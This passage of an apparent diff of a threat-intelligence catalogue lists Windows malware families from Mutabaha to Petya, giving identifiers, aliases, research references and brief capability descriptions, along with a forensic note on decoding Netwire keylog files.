- ] - }, - "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", - "value": "Mutabaha", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", - "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", - "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] - }, - "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", - "value": "MyKings Spreader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", - "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" - ] - }, - "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", - "value": "MyloBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", - "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" - ] - }, - "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", - "value": "N40", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" - ] - }, - "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", - "value": "Nabucur", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", - "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" - ] - }, - "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", - "value": "Nagini", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/" - ] - }, - "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", - "value": "Naikon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] - }, - "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", - "value": "Nanocore RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" - ] - }, - "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", - "value": "NanoLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", - "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", - "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" - ] - }, - "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", - "value": "Narilam", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", - "https://www.ncsc.gov.uk/alerts/turla-group-malware" - ] - }, - "uuid": "d8295eba-60ef-4900-8091-d694180de565", - "value": "Nautilus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", - "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" - ] - }, - "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", - "value": "NavRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "nucurs" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", - "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", - "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", - "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", - "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", - "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/", - "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/" - ] - }, - "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", - "value": "Necurs", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Nemain" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", - "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" - ] - }, - "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", - "value": "Nemim", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", - "value": "NetC", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ScoutEagle" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - }, - "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", - "value": "NETEAGLE", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger", - "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" - ] - }, - "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", - "value": "Netrepser", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", - "http://www.netsupportmanager.com/index.asp", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", - "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" - ] - }, - "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", - "value": "NetSupportManager RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "TravNet" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", - "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", - "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" - ] - }, - "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", - "value": "NetTraveler", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Recam" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", - "https://www.circl.lu/pub/tr-23/", - "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", - "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" - ] - }, - "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", - "value": "NetWire RC", - "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", - "https://www.ncsc.gov.uk/alerts/turla-group-malware" - ] - }, - "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", - "value": "Neuron", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Kasidet" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", - "http://securitykitten.github.io/an-evening-with-n3utrino/", - "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", - "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", - "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", - "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", - "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", - "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/" - ] - }, - "uuid": "3760920e-4d1a-40d8-9e60-508079499076", - "value": "Neutrino", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Jimmy" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", - "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", - "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" - ] - }, - "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", - "value": "Neutrino POS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", - "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" - ] - }, - "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", - "value": "NewCore RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", - "https://asert.arbornetworks.com/lets-talk-about-newposthings/", - "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", - "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" - ] - }, - "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", - "value": "NewPosThings", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", - "value": "NewsReels", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CT" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" - ] - }, - "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", - "value": "NewCT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot", - "https://twitter.com/benkow_/status/789006720668405760" - ] - }, - "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", - "value": "Nexster Bot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger", - "https://twitter.com/PhysicalDrive0/status/842853292124360706", - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/" - ] - }, - "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", - "value": "NexusLogger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", - "https://research.checkpoint.com/ramnits-network-proxy-servers/" - ] - }, - "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", - "value": "Ngioweb", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove", - "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html" - ] - }, - "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130", - "value": "nitlove", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" - ] - }, - "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", - "value": "Nitol", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Bladabindi" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", - "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", - "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", - "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] - }, - "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", - "value": "NjRAT", - "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer", - "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" - ] - }, - "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", - "value": "Nocturnal Stealer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", - "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", - "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" - ] - }, - "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", - "value": "Nokki", - "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" - ] - }, - "uuid": "6207668d-af17-44a6-97a2-e1b448264529", - "value": "Nozelesn (Decryptor)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", - "https://twitter.com/malwrhunterteam/status/910952333084971008", - "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", - "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" - ] - }, - "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", - "value": "nRansom", - "description": "" - }, - { - "meta": { - "synonyms": [ - "nymain" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", - "https://www.cert.pl/en/news/single/nymaim-revisited/", - "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", - "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", - "https://bitbucket.org/daniel_plohmann/idapatchwork" - ] - }, - "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", - "value": "Nymaim", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2", - "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" - ] - }, - "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", - "value": "Nymaim2", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" - ] - }, - "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", - "value": "OddJob", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" - ] - }, - "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", - "value": "Odinaff", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", - "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", - "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", - "https://securelist.com/the-devils-in-the-rich-header/84348/", - "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", - "https://securelist.com/olympic-destroyer-is-still-alive/86169/", - "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", - "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", - "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" - ] - }, - "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", - "value": "Olympic Destroyer", - "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", - "https://twitter.com/malwrhunterteam/status/1001461507513880576" - ] - }, - "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", - "value": "OneKeyLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", - "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" - ] - }, - "uuid": "82733125-da67-44ff-b2ac-b16226088211", - "value": "ONHAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", - "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html", - "https://www.f-secure.com/weblog/archives/00002764.html" - ] - }, - "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", - "value": "OnionDuke", - "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. " - }, - { - "meta": { - "synonyms": [ - "SBot", - "Onliner" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", - "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" - ] - }, - "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", - "value": "OnlinerSpambot", - "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" - ] - }, - "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", - "value": "OopsIE", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", - "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html", - "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", - "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", - "https://forum.malekal.com/viewtopic.php?t=21806" - ] - }, - "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", - "value": "Opachki", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", - "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" - ] - }, - "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", - "value": "OpGhoul", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" - ] - }, - "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", - "value": "OpBlockBuster", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", - "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" - ] - }, - "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", - "value": "OrcaRAT", - "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", - "https://orcustechnologies.com/", - "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", - "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors" - ] - }, - "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", - "value": "Orcus RAT", - "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", - "https://www.gdata.de/blog/2017/11/30151-ordinypt", - "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/" - ] - }, - "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", - "value": "Ordinypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", - "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", - "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" - ] - }, - "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", - "value": "Overlay RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", - "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" - ] - }, - "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", - "value": "OvidiyStealer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "luckyowa" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", - "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" - ] - }, - "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", - "value": "owaauth", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", - "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/", - "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/" - ] - }, - "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", - "value": "PadCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", - "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", - "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" - ] - }, - "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", - "value": "paladin", - "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011." - }, - { - "meta": { - "synonyms": [ - "ZeusPanda" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", - "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", - "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", - "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", - "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", - "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", - "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", - "https://www.spamhaus.org/news/article/771/", - "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", - "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", - "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", - "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", - "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", - "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", - "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", - "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" - ] - }, - "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", - "value": "PandaBanker", - "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", - "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" - ] - }, - "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", - "value": "parasite_http", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" - ] - }, - "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", - "value": "Penco", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", - "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" - ] - }, - "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", - "value": "PetrWrap", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", - "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", - "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", - "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - 